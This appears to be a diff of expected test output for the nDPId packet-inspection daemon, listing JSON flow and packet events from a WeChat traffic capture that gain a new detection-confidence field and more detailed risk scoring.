+00637{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1492167440984,"flow_last_seen":1492167695144,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00636{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167449288,"flow_last_seen":1492167697384,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167650311,"flow_last_seen":1492167650345,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60562,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1216,"source":"wechat.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1492167650348,"flow_last_seen":1492167650467,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":3552,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1492167757556,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":35601,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1492167765155,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167765155,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8EUFAAEARpLrAqAFnwKgB\/uvEADUAKLhvU\/MBAAABAAAAAAAAA3dlYgZ3ZWNoYXQDY29tAAABAAE="}
-00733{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00759{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1218,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765155,"flow_last_seen":1492167765155,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1492167765155,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00901{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1492167765432,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":391,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":391,"pkt_l4_len":357,"ts_msec":1492167765432,"pkt":"eJKcD6iO8IQvSpdgCABFoAF5AABAAEARtB7AqAH+wKgBZwA168QBZQj\/U\/OBgAABAAMABAALA3dlYgZ3ZWNoYXQDY29tAAABAAHADAAFAAEAAAJYAAcEd2ViMcAQwCwAAQABAAACWAAEy82Tq8AsAAEAAQAAAlgABMvNl6LALAACAAEAAU8CAA0HbnMtdGVsMQJxccAXwCwAAgABAAFPAgAKB25zLWNuYzHAZ8AsAAIAAQABTwIACQZucy1vczHAZ8AsAAIAAQABTwIACgducy1jbW4xwGfAjgABAAEAAAFuAAS4ac55wI4AAQABAAABbgAEy82TmMCOAAEAAQAAAW4ABMvNsDrAjgABAAEAAAFuAARnBx7vwKMAAQABAAANPgAEtv5vZMCjAAEAAQAADT4ABLfoeDvAowABAAEAAA0+AAS2\/hBmwHgAAQABAAABmAAEb6Frw8B4AAEAAQAAAZgABG+haBHAXwABAAEAAAFuAAS2jLiMwF8AAQABAAABbgAEtwK6mQ=="}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1492167765432,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.147.171"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1219,"source":"wechat.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167765155,"flow_last_seen":1492167765432,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":349,"flow_tot_l4_payload_len":381,"flow_avg_l4_payload_len":190,"midstream":0,"ts_msec":1492167765432,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":60356,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WeChat","breed":"Fun","category":"Chat"},"dns": {"query":"web.wechat.com","num_queries":1,"num_answers":18,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.205.147.171"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765433,"flow_last_seen":1492167765433,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167765433,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1492167765433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167765433,"pkt":"8IQvSpdgeJKcD6iOCABFAAA88RZAAEAGKB3AqAFny82Tq+K0AbvYTb2iAAAAAKACchDtIAAAAgQFtAQCCAoAMky0AAAAAAEDAwc="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167765657,"flow_last_seen":1492167765657,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167765657,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58037,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1221,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1492167765657,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167765657,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZwNAAEAGsjDAqAFny82Tq+K1Abs3CyvvAAAAAKACchAf3gAAAgQFtAQCCAoAMkzsAAAAAAEDAwc="}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167765701,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rSlk19z2E29o6ASN8g4AQAAAgQFoAQCCApF8qRxADJMtAEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167765701,"pkt":"8IQvSpdgeJKcD6iOCABFAAA08RdAAEAGKCTAqAFny82Tq+K0AbvYTb2jpZNfdIAQAOWdWQAAAQEICgAyTPdF8qRx"}
-00811{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00837{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167765433,"flow_last_seen":1492167765701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1492167765701,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1492167765933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167765933,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC8GKZTLzZOrwKgBZwG74rU+QocNNwsr8KASN8h9cwAAAgQFoAQCCApFrtG3ADJM7AEDAwc="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"wechat.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1492167765933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492167765933,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZwRAAEAGsjfAqAFny82Tq+K1Abs3CyvwPkKHDoAQAOXiyQAAAQEICgAyTTFFrtG3"}
-00868{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00894{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1228,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+01428{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"wechat.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167765433,"flow_last_seen":1492167765976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"ts_msec":1492167765976,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167619048,"flow_last_seen":1492167654504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54106,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00602{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1492167617248,"flow_last_seen":1492167640200,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":8029,"flow_avg_l4_payload_len":308,"midstream":0,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
 00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1492167617498,"flow_last_seen":1492167640214,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54112,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1251,"source":"wechat.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492167669545,"flow_last_seen":1492167669545,"flow_idle_time":180000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1492167776783,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167776953,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167776953,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58038,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"wechat.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1492167776953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167776953,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8k9VAAEAGhV7AqAFny82Tq+K2AbuZa8QhAAAAAKACchAaQgAAAgQFtAQCCAoAMlf0AAAAAAEDAwc="}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1259,"source":"wechat.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167777204,"flow_last_seen":1492167777204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1492167777204,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
